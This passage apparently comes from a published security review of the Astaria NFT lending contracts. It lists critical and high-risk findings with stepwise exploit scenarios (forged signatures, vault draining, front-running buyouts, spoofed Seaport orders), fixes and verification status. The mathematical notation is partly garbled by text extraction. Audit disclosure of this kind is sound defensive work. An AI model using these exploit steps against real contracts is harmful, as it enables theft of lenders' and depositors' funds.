accurate for expected as part of it might be drained to the previous WithdrawProxy. • WithdrawProxy.sol#L304, needs to mention that ... is always increased by the transfer amount from the PublicVault or the next epoch's WithdrawProxy • LienToken.sol#L273-L276, The NatSpec comment needs to be updated as it's not correct in the current protocol: - - + + * @notice Retrieves a lienCount for specific collateral * @param collateralId the Lien to compute a point for * @notice Retrieves the ID of the LienToken associated to this collateralId * @param collateralId The ID of the CollateralToken. • AuthInitializable.sol#L19, the link is broken. • AuthInitializable.sol#L20, the link needs to be updated to https://github.com/transmissions11/solmate/blob/v7/src/auth/Auth.sol • AstariaRouter.sol#L535-L536, The NatSpec comment needs to be updated as it's not correct in the current protocol: -* @notice Deposits collateral and requests loans for multiple NFTs at once. -* @param commitment The commitment proofs and requested loan data for each loan. +* @notice Deposits collateral and requests a loan for an NFT. +* @param commitment The commitment proof and requested loan data. • WithdrawProxy.sol#L247 typo: - + * @notice returns the final auctio nend * @notice returns the final auction end • AstariaVaultBase.sol#L47, comment should say 61. 73 diff --git a/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review.txt new file mode 100644 index 0000000..a492ece --- /dev/null +++ b/findings_newupdate/spearbit/Astaria-Spearbit-Security-Review.txt @@ -0,0 +1,183 @@ +5.1.1 LienToken.transferFrom does not update a public vault's bookkeeping parameters when a lien is transferred to it. Severity: Critical Risk Context: LienToken.sol#L303 Description: When transferFrom is called, there is not check whether the from or to parameters could be a public vault. Currently, there is no mechanism for public vaults to transfer their liens. But private vault owners who are also owners of the vault's lien tokens, they can call transferFrom and transfer their liens to a public vault. In this case, we would need to make sure to update the bookkeeping for the public vault that the lien was transferred to. On the LienToken side, s.LienMeta[id].payee needs to be set to the address of the public vault. And on the PublicVault side, yIntercept, slope, last, epochData of VaultData need to be updated (this requires knowing the lien's end). However, private vaults do not keep a record of these values, and the corresponding values are only saved in stacks off-chain and validated on-chain using their hash. Recommendation: • Either to block transferring liens to public vaults or • Private vaults or the LienToken would need to have more storage parameters that would keep a record of some values for each lien so that when the time comes to transfer a lien to a public vault, the parameters mentioned in the Description can be updated for the public vault. +5.1.2 Anyone can take a valid commitment combined with a self-registered private vault to steal funds from any vault without owning any collateral Severity: Critical Risk Context: VaultImplementation.sol#L279, VaultImplementation.sol#L227 Description: The issue stems from the following check in VaultImplementation._validateCommitment(params, receiver): if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) // <-- the problematic condition ) { ... In this if block if receiver is a valid vault the body of the if is skipped. A valid vault is one that has been registered in AstariaRouter using newVault or newPublicVault. So for example any supplied private vault as a receiver would be allowed here and the call to _validateCommitment will continue without reverting at least in this if block. If we backtrack function calls to _validateCommitment, we arrive to 3 exposed endpoints: • commitToLiens • buyoutLien • commitToLien A call to commitToLiens will end up having the receiver be the AstariaRouter. A call to buyoutLien will set the receiver as the recipient() for the vault which is either the vault itself for public vaults or the owner for private vaults. So we are only left with commitToLien, where the caller can set the value for the receiver directly. 8 A call to commitToLien will initiate a series of function calls, and so receiver is only supplied to _validateCommit- ment to check whether it is allowed to be used and finally when transferring safeTransfer) wETH. This opens up exploiting scenarios where an attacker: 1. Creates a new private vault by calling newVault, let's call it V . 2. Takes a valid commitment C and combines it with V and supply those to commitToLien. 3. Calls withdraw endpoint of V to withdraw all the funds. For step 2. the attacker can source valid commitments by doing either of the following: 1. Frontrun calls to commitToLiens and take all the commitments C0, (cid:1) (cid:1) (cid:1) , Cn and supply them one by one along with V to commitToLien endpoint of the vault that was specified by each Ci . 2. Frontrun calls to commitToLien endpoints of vaults, take their commitment C and combine it with V to send to commitToLien. 3. Backrun the either scenarios from the above points and create a new commitment with new lien request that tries to max out the potential debt for a collateral while also keeping other inequalities valid (for example, the inequality regarding liquidationInitialAsk). Recommendation: If the commitToLien endpoint is only supposed to be called by AstariaRouter make sure to apply that restriction. Or if it is allowed to be called by anyone, the !ROUTER().isValidVault(receiver) condition would need to be modified. As an example, one can use the commitment.lienRequest.strategy.vault (let's call it Vs) and make sure that when ROUTER().isValidVault(receiver) === true then R = Vs (where R is the receiver, note some parameters might be redundant in this case) and also we would need to take into consideration that either the vault owners or delegates also signing Vs or the strategy validators would take this value into consideration when validateAndParse is called. This 2nd recommendation might interfere with what commit- ment.lienRequest.strategy.vault would need to represent in other places (the vault that the amount is bor- rowed from, not sent to). +5.1.3 Collateral owner can steal funds by taking liens while asset is listed for sale on Seaport Severity: Critical Risk Context: LienToken.sol#L368-372 Description: We only allow collateral holders to call listForSaleOnSeaport if they are listing the collateral at a price that is sufficient to pay back all of the liens on their collateral. When a new lien is created, we check that collateralStateHash != bytes32("ACTIVE_AUCTION") to ensure that the collateral is able to accept a new lien. However, calling listForSaleOnSeaport does not set the collateralStateHash, so it doesn't stop us from taking new liens. As a result, a user can deposit collateral and then, in one transaction: • List the asset for sale on Seaport for 1 wei. • Take the maximum possible loans against the asset. • Buy the asset on Seaport for 1 wei. The 1 wei will not be sufficient to pay back the lenders, and the user will be left with the collateral as well as the loans (minus 1 wei). Recommendation: Either set the collateralStateHash when an item is listed for sale on Seaport, or check the s.collateralIdToAuction variable before allowing a lien to be taken. Astaria: listForSaleOnSeaport has been removed in the following PR and that resolves the issue PR 206. 9 Spearbit: Verified. +5.1.4 validateStack allows any stack to be used with collateral with no liens Severity: Critical Risk Context: LienToken.sol#L225-232 Description: The validateStack modifier is used to confirm that a stack entered by a user matches the stateHash in storage. However, the function reverts under the following conditions: if (stateHash != bytes32(0) && keccak256(abi.encode(stack)) != stateHash) { revert InvalidState(InvalidStates.INVALID_HASH); } The result is that any collateral with stateHash == bytes32(0) (which is all collateral without any liens taken against it yet) will accept any provided stack as valid. This can be used in a number of harmful ways. Examples of vulnerable endpoints are: • createLien: If we create the first lien but pass a stack with other liens, those liens will automatically be included in the stack going forward, which means that the collateral holder will owe money they didn't receive. • makePayment: If we make a payment on behalf of a collateral with no liens, but include a stack with many liens (all owed to me), the result will be that the collateral will be left with the remaining liens continuing to be owed • buyoutLien: Anyone can call buyoutLien(...) and provide parameters that are spoofed but satisfy some constraints so that the call would not revert. This is currently possible due to the issue in this context. As a consequence the caller can – _mint any unminted liens which can DoS the system. – _burn lienIds that they don't have the right to remove. – manipulate any public vault's storage (if it has been set as a payee for a lien) through its handleBuyout- Lien. It seems like this endpoint might have been meant to be a restricted endpoint that only registered vaults can call into. And the caller/user is supposed to only call into here from VaultImplementa- tion.buyoutLien. Recommendation: modifier validateStack(uint256 collateralId, Stack[] memory stack) { + + + LienStorage storage s = _loadLienStorageSlot(); bytes32 stateHash = s.collateralStateHash[collateralId]; if (stateHash == bytes32(0) && stack.length != 0) { revert InvalidState(InvalidStates.EMPTY_STATE); } if (stateHash != bytes32(0) && keccak256(abi.encode(stack)) != stateHash) { revert InvalidState(InvalidStates.INVALID_HASH); } _; } This will also require adding the InvalidStates.EMPTY_STATE to the enum. Astaria: PR 194. Spearbit: Confirmed that this is fixed in the following PR 194. 10 +5.1.5 A borrower can list their collateral on Seaport and receive almost all the listing price without paying back their liens Severity: Critical Risk Context: LienToken.sol#L480 Description: When the collateral s.auctionData is not populated and thus, function gets called since stack.length is 0, this loop will not run and no payment is sent to the lending vaults. The rest of the payment is sent to the borrower. And the collateral token and its related data gets burnt/deleted by calling settleAuction. The lien tokens and the vaults remain untouched as though nothing has happened. is listed on SeaPort by the borrower using listForSaleOnSeaport, if that order gets fulfilled/matched and ClearingHouse's fallback So basically a borrower can: 1. Take/borrow liens by offering a collateral. 2. List their collateral on SeaPort through the listForSaleOnSeaport endpoint. 3. Once/if the SeaPort order fulfills/matches, the borrower would be paid the listing price minus the amount sent to the liquidator (address(0) in this case, which should be corrected). 4. Collateral token/data gets burnt/deleted. 5. Lien token data remains and the loans are not paid back to the vaults. And so the borrower could end up with all the loans they have taken plus the listing price from the SeaPort order. Note that when a user lists their own collateral on Seaport, it seems that we intentionally do not kick off the auction process: • Liens are continued. • Collateral state hash is unchanged. • liquidator isn't set. • Vaults aren't updated. • Withdraw proxies aren't set, etc. Related issue 88. Recommendation: Be careful and also pay attention that listing by a borrower versus auctioning by a liquidator take separate return/payback paths. It is recommended to separate the listing and liquidating logic and make sure auction funds and distributed appropriately. Most importantly, the auction stack must be set. Astaria: We've removed the ability for self-listing on seaport as the fix for v0, will add this feature this in a future release. Spearbit: Fixed in the following PR by removing the listForSaleOnSeaport endpoint PR 206. +5.1.6 Phony signatures can be used to forge any strategy Severity: Critical Risk Context: VaultImplementation.sol#L249 Description: In _validateCommitment(), we check that the merkle root of the strategy has been signed by the strategist or delegate. After the signer is recovered, the following check is performed to validate the signature: recovered != owner() && recovered != s.delegate && recovered != address(0) 11 This check seems to be miswritten, so that any time recovered == address(0), the check passes. When ecrecover is used to check the signed data, it returns address(0) in the situation that a phony signature is submitted. See this example for how this can be done. The result is that any borrower can pass in any merkle root they'd like, sign it in a way that causes address(0) to return from ecrecover, and have their commitment validated. Recommendation: if ( - + recovered != owner() && recovered != s.delegate && recovered != address(0) (recovered != owner() && recovered != s.delegate) || recovered == address(0) ) { revert IVaultImplementation.InvalidRequest( InvalidRequestReason.INVALID_SIGNATURE ); } Astaria: Fixed in PR 209. Spearbit: Verified. 5.2 High Risk +5.2.1 Inequalities involving liquidationInitialAsk and potentialDebt can be broken when buyoutLien is called Severity: High Risk Context: • LienToken.sol#L102 • VaultImplementation.sol#L305 • LienToken.sol#L377-L378 • LienToken.sol#L427 • AstariaRouter.sol#L542 Description: When we commit to a new lien, the following gets checked to be true for all j 2 0, (cid:1) (cid:1) (cid:1) , n (cid:0) 1: onew + on(cid:0)1 + (cid:1) (cid:1) (cid:1) + oj (cid:20) Lj where: parameter description oi onew n Li L0 k k A0 k _getOwed(newStack[i], newStack[i].point.end) _getOwed(newSlot, newSlot.point.end) stack.length newStack[i].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk params.position params.encumber.amount 12 so in a stack in general we should have the: But when an old lien is replaced with a new one, we only perform the following checks for L0 k : (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj 0 0 0 k ^ L k (cid:21) A L k > 0 And thus we can introduce: • L0 • o0 k (cid:28) Lk or k (cid:29) ok (by pushing the lien duration) which would break the inequality regarding oi s and Li . If the inequality is broken, for example, if we buy out the first lien in the stack, then if the lien expires and goes into a Seaport auction the auction's starting price L0 would not be able to cover all the potential debts even at the beginning of the auction. Recommendation: When buyoutLien is called, we would need to loop over j and check the inequalities again: +5.2.2 VaultImplementation.buyoutLien can be DoSed by calls to LienToken.buyoutLien (cid:1) (cid:1) (cid:1) + oj+1 + oj (cid:20) Lj Severity: High Risk Context: • LienToken.sol#L102 • LienToken.sol#L121 • VaultImplementation.sol#L305 Description: Anyone can call into LienToken.buyoutLien and provide params of the type LienActionBuyout: params.incoming is not used, so for example vault signatures or strategy validation is skipped. There are a few checks for params.encumber. Let's define the following variables: parameter value i kj tj ej e0 i lj l 0 i rj r 0 i c params.position params.encumber.stack[j].point.position params.encumber.stack[j].point.last params.encumber.stack[j].point.end tnow + D0 i params.encumber.stack[j].point.lienId i )) where h is the keccak256 of the encoding i , r 0 i , c0 i , S0 i , D0 i , V 0 i , (A0max h(N 0 i , P 0 i , L0 params.encumber.stack[j].lien.details.rate : old rate params.encumber.lien.details.rate : new rate params.encumber.collateralId 13 parameter value cj c0 i Aj A0 i Amax j A0max i R Nj N 0 i Vj V 0 i Sj S0 i Dj D0 i Pj P0 i Lj L0 i Imin Dmin tnow bi o oj n params.encumber.stack[j].lien.collateralId params.encumber.lien.collateralId params.encumber.stack[j].point.amount params.encumber.amount params.encumber.stack[j].lien.details.maxAmount params.encumber.lien.details.maxAmount params.encumber.receiver params.encumber.stack[j].lien.token params.encumber.lien.token params.encumber.stack[j].lien.vault params.encumber.lien.vault params.encumber.stack[j].lien.strategyRoot params.encumber.lien.strategyRoot params.encumber.stack[j].lien.details.duration params.encumber.lien.details.duration params.encumber.stack[j].lien.details.maxPotentialDebt params.encumber.lien.details.maxPotentialDebt params.encumber.stack[j].lien.details.liquidationInitialAsk params.encumber.lien.details.liquidationInitialAsk AstariaRouter.s.minInterestBPS AstariaRouter.s.minDurationIncrease block.timestamp buyout _getOwed(params.encumber.stack[params.position], block.timestamp) _getOwed(params.encumber.stack[j], params.encumber.stack[j].point.end) params.encumber.stack.length O = o0 + o1 + (cid:1) (cid:1) (cid:1) + on(cid:0)1 _getMaxPotentialDebtForCollateral(params.encumber.stack) sj s0 i params.encumber.stack[j] newStack Let's go over the checks and modifications that buyoutLien does: 1. validateStack is called to make sure that the hash of params.encumber.stack matches with s.collateralStateHash value of c. This is not important and can be bypassed by the exploit even after the fix for Issue 106. 2. _createLien is called next which does the following checks: 2.1. c is not up for auction. 2.2. We haven't reached max number of liens, currently set to 5. 2.3. L0 > 0 2.4. If params.encumber.stack is not empty then c0 i , (A0max i , L0 i )) where h is the hashing mechanism of encoding and then taking the keccak256. 2.6 The new stack slot and i = c0 2.5. We _mint a new lien for R with id equal to h(N 0 i and L0 i (cid:21) A0 i , V 0 i , D0 i , S0 i , P 0 i , c0 , r 0 i i 14 the new lien id is returned. 3. isValidRefinance is called which performs the following checks: 3.1. checks c0 i = c0 3.2. checks either or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i i (cid:20) ri ) ^ (e0 (r 0 is in auction by checking s.collateralStateHash's value. i (cid:21) ei + Dmin) 4. check where c0 i 5. check O (cid:20) P0 i . 6. check A0max (cid:21) o. 7. send wETH through TRANSFER_PROXY from msg.sender to payee of li with the amount of bi . 8. if payee of li is a public vault, do some book keeping by calling handleBuyoutLien. 9. call _replaceStackAtPositionWithNewLien to: • 9.1. replace si with s0 • 9.2. _burn li . • 9.3. delete s.lienMeta of li . i in params.encumber.stack. So in a nutshell the important checks are: • c, ci are not in auction (not important for the exploit) • c0 i = c0 i and L0 • n is less than or equal to max number of allowed liens ( 5 currently) (not important for the exploit) • L0 i (cid:21) A0 • O (cid:20) P0 i • A0max i > 0 (cid:21) o i or (r 0 i < ri (cid:0) Imin) ^ (e0 i (cid:21) ei ) i (cid:20) ri ) ^ (e0 (r 0 i (cid:21) ei + Dmin) Exploit An attacker can DoS the VaultImplementation.buyoutLien as follows: 1. A vault decides to buy out a collateral's lien to offer better terms and so signs a commitment and some- one on behalf of the vault calls VaultImplementation.buyoutLien which if executed would call LienTo- ken.buyoutLien with the following parameters: 15 LienActionBuyout({ incoming: incomingTerms, position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: recipient(), lien: ROUTER().validateCommitment({ commitment: incomingTerms, timeToSecondEpochEnd: _timeToSecondEndIfPublic() }), stack: stack }) }) 2. The attacker fronrun the call from step 1. and instead provide the following modified parameters to LienTo- ken.buyoutLien LienActionBuyout({ incoming: incomingTerms, // not important, since it is not used and can be zeroed-out to save tx gas position: position, encumber: ILienToken.LienActionEncumber({ collateralId: collateralId, amount: incomingTerms.lienRequest.amount, receiver: msg.sender, // address of the attacker lien: ILienToken.Lien({ // note that the lien here would have the same fields as the original message by the vault rep. ,! token: address(s.WETH), vault: incomingTerms.lienRequest.strategy.vault, // address of the vault offering a better term strategyRoot: incomingTerms.lienRequest.merkle.root, collateralId: collateralId, details: details // see below }), stack: stack }) }) Where details provided by the attacker can be calculated by using the below snippet: uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)); (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( s.strategyValidators[nlrType] ).validateAndParse( commitment.lienRequest, s.COLLATERAL_TOKEN.ownerOf( commitment.tokenContract.computeId(commitment.tokenId) ), commitment.tokenContract, commitment.tokenId ); The result is that: • The newLienId that was supposed to be _minted for the ‘recipient()‘ of the vault, gets minted for the at- tacker. • The call to VaultImplementation.buyoutLien would fail, since the newLienId is already minted, and so the vault would not be able to receives the interests it had anticipated. • When there is a payment or Seaport auction settlement, the attacker would receive the funds instead. 16 • The attacker can intorduces a malicous contract into the protocol ken.ownerOf(newLienId) without needing to register for a vault. that would be LienTo- To execute this attack, the attacker would need to spend the buyout amount of assets. Also the attacker does not necessarily need to front run a transaction to buyout a lien. They can pick their own hand-crafted parameters that would satisfy the conditions in the analysis above to introduce themselves in the protocol. Recommendation: There are multiple ways to mitigate this issue. 1. We can restrict LienToken.buyoutLien endpoint to be only called by the registered vaults in AstariaRouter. 2. In LienToken.buyoutLien, use params.incoming to validate the signatures and lien details. The above 2 solutions would prevent an attacker introducing/minting a new lien id using parameters from a different vault without themselves registering a vault. Spearbit: This is resolved in the following commit by restricting the buyoutLien of the LienToken to only valid/registered vaults: commit 24da50. +5.2.3 VaultImplementation.buyoutLien does not update the new public vault's parameters and does not transfer assets between the vault and the borrower Severity: High Risk Context: • VaultImplementation.sol#L305 • LienToken.sol#L102 • LienToken.sol#L116 • LienToken.sol#L165-L174 Description: VaultImplementation.buyoutLien does not update the accounting for the vault (if it's public). The slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) are not updated. They are updated for the payee of the swapped-out lien if the payee is a public vault by calling handleBuyoutLien. Also, the buyout amount is paid out by the vault itself. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender and the new vault. Recommendation: 1. If the vault that VaultImplementation.buyoutLien endpoint was called into is a public vault, make sure to update its slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) when the new lien is created. 2. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender that called VaultImplementation.buyoutLien and the vault. If the buyout amount is higher than the new lien amount, we need to make sure the msg.sender also transfers some assets (wETH) to the vault. And the other way around, if the new lien amount is higher than the buyout amount, the vault needs to transfer some assets (wETH) to the borrower / msg.sender. 17 +5.2.4 setPayee doesn't update y intercept or slope, allowing vault owner to steal all funds Severity: High Risk Context: • LienToken.sol#L868-878 • LienToken.sol#L165-173 Description: When setPayee() is called, the payment for the lien is no longer expected to go to the vault. How- ever, this change doesn't impact the vault's y-intercept or slope, which are used to calculate the vault's totalAs- sets(). This can be used maliciously by a vault owner to artificially increase their totalAssets() to any arbitrary amount: • Create a lien from the vault. • SetPayee to a non-vault address. • Buyout the lien from another vault (this will cause the other vault's y-int and slope to increase, but will not impact the y-int and slope of the original vault because it'll fail the check on L165 that payee is a public vault. • Repeat the process again going the other way, and repeat the full cycle until both vault's have desired totalAssets(). For an existing vault, a vault owner can withdraw a small amount of assets each epoch. If, in any epoch, they are one of the only users withdrawing funds, they can perform this attack immediately before the epoch is pro- cessed. The result is that the withdrawal shares will by multiplied by totalAssets() / totalShares() to get the withdrawal rate, which can be made artificially high enough to wipe out the entire vault. Recommendation: Adjust the y-intercept and slope of the old payee and the new payee immediately upon the payee being set. Astaria: We're thinking of removing the ability for the owner to change the payee altogether. There's no clear benefit to having this in the first place, since the payee would have no guarantees on receiving funds since we reset payee on LienToken transfers. We can just lock setPayee() to only be callable by a WithdrawProxy (if it needs auction funds), which is the primary use case anyways. Spearbit: Confirmed, removing the setPayee function in the following PR PR 205 solves the issue. +5.2.5 settleAuction() doesn't check if the auction was successful Severity: High Risk Context: CollateralToken.sol#L600 Description: settleAuction() is a privileged functionality called by LienToken.payDebtViaClearingHouse(). settleAuction() is intended to be called on a successful auction, but it doesn't verify that that's indeed the case. Anyone can create a fake Seaport order with one of its considerations set as the CollateralToken as described in Issue 93. Another potential issue is if the Seaport orders can be "Restricted" in future, then there is a possibility for an authorized entity to force settleAuction on CollateralToken, and when SeaPort tries to call back on the zone to validate it would fail. Recommendation: The following validations can be performed: • CollateralToken doesn't own the underlying NFT. • collateralIdToAuction[collateralId] is active. Now, settleAuction() can only be called on the success of the Seaport auction created by Astaria protocol. 18 +5.2.6 Incorrect auction end validation in liquidatorNFTClaim() Severity: High Risk Context: CollateralToken.sol#L119 Description: liquidatorNFTClaim() does the following check to recognize that Seaport auction has ended: if (block.timestamp < params.endTime) { //auction hasn't ended yet revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); } Here, params is completely controlled by users and hence to bypass this check, the caller can set params.endTime to be less than block.timestamp. Thus, a possible exploit scenario occurs when AstariaRouter.liquidate() is called to list the underlying asset on Seaport which also sets liquidator address. Then, anyone can call liquidatorNFTClaim() to transfer the underlying asset to liquidator by setting params.endTime < block.timestamp. Recommendation: The parameter passed to liquidatorNFTClaim() should be validated against the parameters created for the Seaport auction. To do that: • collateralIdToAuction mapping which currently maps collateralId to a boolean value indicating an ac- tive auction, should instead map from collateralId to Seaport order hash. • All usages of collateralIdToAuction should be updated. For example, isValidOrder() and isVali- dOrderIncludingExtraData() should be updated: return - + s.collateralIdToAuction[uint256(zoneHash)] s.collateralIdToAuction[uint256(zoneHash)] == orderHash ? ZoneInterface.isValidOrder.selector : bytes4(0xffffffff); • liquidatorNFTClaim() should verify that hash of params matches the value stored in collateralIdToAuc- tion mapping. This validates that params.endTime is not spoofed. Astaria: Fixed in PR 210. Spearbit: Verified. +5.2.7 Typed structured data hash used for signing commitments is calculated incorrectly Severity: High Risk Context: • VaultImplementation.sol#L150-L151 • VaultImplementation.sol#L172-L176 • IVaultImplementation.sol#L41 Description: Since STRATEGY_TYPEHASH == keccak256("StrategyDetails(uint256 nonce,uint256 deadline,bytes32 root)") The hash calculated in _encodeStrategyData is incorrect according to EIP-712. s.strategistNonce is of type uint32 and the nonce type used in the type hash is uint256. Also the struct name used in the typehash collides with StrategyDetails struct name defined as: 19 struct StrategyDetails { uint8 version; uint256 deadline; address vault; } Recommendation: We suggest the followings: 1. Update the STRATEGY_TYPEHASH to reflect the correct type uint32 for the nonce. 2. Keep the STRATEGY_TYPEHASH using the non-inlined version below since the compiler would inline the value off-chain: bytes32 public constant STRATEGY_TYPEHASH = keccak256("StrategyDetails(uint32 nonce,uint256 ,! deadline,bytes32 root)"); 3. To avoid name collision for the 2 structs, rename one of the StrategyDetails (even though one is not defined directly). +5.2.8 makePayment doesn't properly update stack, so most payments don't pay off debt Severity: High Risk Context: LienToken.sol#615-635 Description: As we loop through individual payment in _makePayment, each is called with: (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); This call returns the updated stack as newStack but then uses the function argument stack again in the next iteration of the loop. The newStack value is unused until the final iterate, when it is passed along to _updateCollateralStateHash(). This means that the new state hash will be the original state with only the final loan repaid, even though all other loans have actually had payments made against them. Recommendation: uint256 n = stack.length; + newStack = stack; for (uint256 i; i < n; ) { (newStack, spent) = _payment( s, stack, newStack, uint8(i), totalCapitalAvailable, address(msg.sender) - + ); This fixes the issue above, but the solution must also take into account the fix for the loop within _payment outlined here in Issue 134. If you follow the suggestion in that issue, then this function should return an extra value (elementRemoved) and use that to dictate whether the loop iterates forward, or remains at the same i for the next run. The final result should look like: 20 function _makePayment( LienStorage storage s, Stack[] calldata stack, uint256 totalCapitalAvailable ) internal returns (Stack[] memory newStack, uint256 spent) { newStack = stack; bool elementRemoved = false; for (uint256 i; i < newStack.length; ) { (newStack, spent, elementRemoved) = _payment( s, newStack, uint8(i), totalCapitalAvailable, address(msg.sender) ); totalCapitalAvailable -= spent; // if stack is updated, we need to stay at the current index // to process the new element on the same index. if (!elementRemoved) unchecked { ++i }; _updateCollateralStateHash(s, stack[0].lien.collateralId, newStack); } Astaria: Checked if newStack changed length instead of returning an elementRemoved bool because of stack too deep error. +5.2.9 _removeStackPosition() always reverts Severity: High Risk Context: LienToken.sol#L823-L828 Description: removeStackPosition() always reverts since it calls stack array for an index beyond its length: for (i; i < length; ) { unchecked { newStack[i] = stack[i + 1]; ++i; } } Notice that for i==length-1, stack[length] is called. This reverts since length is the length of stack array. Additionally, the intention is to delete the element from stack at index position and shift left the elements ap- pearing after this index. However, an addition increment to the loop index i results in newStack[position] being empty, and the shift of other elements doesn't happen. Recommendation: Apply this diff to LienToken.sol#L823-L831: - - - - + unchecked { ++i; } for (i; i < length; ) { for (i; i < length-1; ) { unchecked { newStack[i] = stack[i + 1]; ++i; } } 21 Note: This issue has to be considered in conjunction with the following issue: • makePayment doesn't properly update stack, so most payments don't pay off debt Astaria: Fixed in PRs 202 and 265. Spearbit: Verified. +5.2.10 Refactor _paymentAH() Severity: High Risk Context: LienToken.sol#L571 Description: _paymentAH() has several vulnerabilities: • stack is a memory parameter. So all the updates made to stack are not applied back to the corresponding storage variable. • No need to update stack[position] as it's deleted later. • decreaseEpochLienCount() is always passed 0, as stack[position] is already deleted. Also decreaseEp- ochLienCount() expects epoch, but end is passed instead. • This if/else block can be merged. updateAfterLiquidationPayment() expects msg.sender to be LIEN_- TOKEN, so this should work. Recommendation: Apply this diff: - + - - - + - - - - function _paymentAH( LienStorage storage s, uint256 collateralId, AuctionStack[] memory stack, AuctionStack[] storage stack, uint256 position, uint256 payment, address payer ) internal returns (uint256) { uint256 lienId = stack[position].lienId; uint256 end = stack[position].end; uint256 owing = stack[position].amountOwed; //checks the lien exists address owner = ownerOf(lienId); address payee = _getPayee(s, lienId); if (owing > payment.safeCastTo88()) { stack[position].amountOwed -= payment.safeCastTo88(); } else { if (owing < payment.safeCastTo88()) { payment = owing; } s.TRANSFER_PROXY.tokenTransferFrom(s.WETH, payer, payee, payment); delete s.lienMeta[lienId]; //full delete delete stack[position]; _burn(lienId); if (_isPublicVault(s, payee)) { if (owner == payee) { IPublicVault(payee).updateAfterLiquidationPayment( IPublicVault.LiquidationPaymentParams({lienEnd: end}) ); } else { IPublicVault(payee).decreaseEpochLienCount(stack[position].end); } 22 } emit Payment(lienId, payment); return payment; } Also note other issues related to _paymentAH(): • Avoid shadowing variables • Comment or remove unused function parameters Astaria: Fixed in PR 201. Spearbit: Verified. +5.2.11 processEpoch() needs to be called regularly Severity: High Risk Context: • PublicVault.sol#L247 • PublicVault.sol#L320 Description: If the processEpoch() endpoint does not get called regularly (especially close to the epoch bound- aries), the updated currentEpoch would lag behind the actual expected value and this will introduce arithmetic errors in formulas regarding epochs and timestamps. Recommendation: Thus public vaults need to create a mechanism so that the processEpoch() gets called regularly maybe using relayers or off-chain bots. Also if there are any outstanding withdraw reserves, the vault needs to be topped up with assets (and/or the current withdraw proxy) so that the full amount of withdraw reserves can be transferred to the withdraw proxy from the epoch before using transferWithdrawReserve, otherwise, the processing of epoch would be halted. And if this halt continues more than one epoch length, the inaccuracy in the epoch number will be introduced in the system. Another mechanism that can be introduced into the system is of incrementing the current epoch not just by one but by an amount depending on the amount of time passed since the last call to the processEpoch() or the timestamp of the current epoch. Astaria: Acknowledged. Spearbit: Acknowledged. +5.2.12 Can create lien for collateral while at auction by passing spoofed data Severity: High Risk Context: LienToken.sol#L368-372 Description: In the createLien function, we check that the collateral isn't currently at auction before giving a lien with the following check: if ( s.collateralStateHash[params.collateralId] == bytes32("ACTIVE_AUCTION") ) { revert InvalidState(InvalidStates.COLLATERAL_AUCTION); } However, collateralId is passed in multiple places in the params: params.encumber.lien. both in params directly and in 23 The params.encumber.lien.collateralId is used everywhere else, and is the final value that is used. But the check is performed on params.collateralId. As a result, we can set the following: • params.encumber.lien.collateralId: collateral that is at auction. • params.collateralId: collateral not at auction. This will allow us to pass this validation while using the collateral at auction for the lien. Recommendation: if ( - + s.collateralStateHash[params.collateralId] == bytes32("ACTIVE_AUCTION") s.collateralStateHash[params.encumber.liencollateralId] == bytes32("ACTIVE_AUCTION") ) { revert InvalidState(InvalidStates.COLLATERAL_AUCTION); } Astaria: We can remove collateralId entirely from the encumber call as its inside lien, the fix is to update to use the lien.collateralId everywhere vs encumber.collateralId Spearbit: Agreed, that seems like the best fix and gets rid of an unneeded parameter. Confirmed the following PR 214 resolves the issue. +5.2.13 stateHash isn't updated by buyoutLien function Severity: High Risk Context: LienToken.sol#L102-187 Description: We never update the collateral state hash anywhere in the buyoutLien function. As a result, once all checks are passed, payment will be transferred from the buyer to the seller, but the seller will retain ownership of the lien in the system's state. Recommendation: We should save the return value of the _replaceStackAtPositionWithNewLien function call and use it to call: s.collateralStateHash[collateralId] = keccak256(abi.encode(newUpdatedStack)); Spearbit: Confirmed, the following commit fixes this issue. +5.2.14 If a collateral's liquidation auction on Seaport ends without a winning bid, the call to liquidatorN- FTClaim does not clear the related data on LienToken's side and also for payees that are public vaults Severity: High Risk Context: CollateralToken.sol#L107 Description: If/when a liquidation auction ends without being fulfilled/matched on Seaport and afterward when the current liquidator calls into liquidatorNFTClaim, the storage data (s.collateralStateHash, s.auctionData, s.lienMeta) on the LienToken side don't get reset/cleared and also the lien token does not get burnt. That means: • s.collateralStateHash[collateralId] stays equal to bytes32("ACTIVE_AUCTION"). • s.auctionData[collateralId] will have the past auction data. • s.lienMeta[collateralId].atLiquidation will be true. That means future calls to commitToLiens by holders of the same collateral will revert. Recommendation: Make sure to clear related storage data on LienToken's side and payees that are public vaults when liquidatorNFTClaim is called. 24 +5.2.15 ClearingHouse cannot detect if a call from Seaport comes from a genuine listing or auction Severity: High Risk Context: ClearingHouse.sol#L21 Description: Anyone can create a SeaPort order with one of the considerations' recipients set to a ClearingHouse with a collateralId that is genuinely already set for auction. Once the spoofed order settles, SeaPort calls into this fallback function and causes the genuine Astaria auction to settle. This allows an attacker to set random items on sale on SeaPort with funds directed here (small buying prices) to settle genuine Astaria auctions on the protocol. This causes: • The Astaria auction payees and the liquidator would not receive what they would expect that should come from the auction. And if payee is a public vault it would introduce incorrect parameters into its system. • Lien data (s.lienMeta[lid]) and the lien token get deleted/burnt. • Collateral token and data get burnt/deleted. • When the actual genuine auction settles and calls back s.collateralIdToAuction[collateralId] check. to here, it will revert due to Recommendation: Astaria needs to introduce a mechanism so that Seaport would send more data to Clearing- House to check the genuineness of the fallback calls. Astaria: In a change yet to be merged, we have the ClearingHouse setup with checks to enforce that it has received enough of a payment in the right asset to complete the 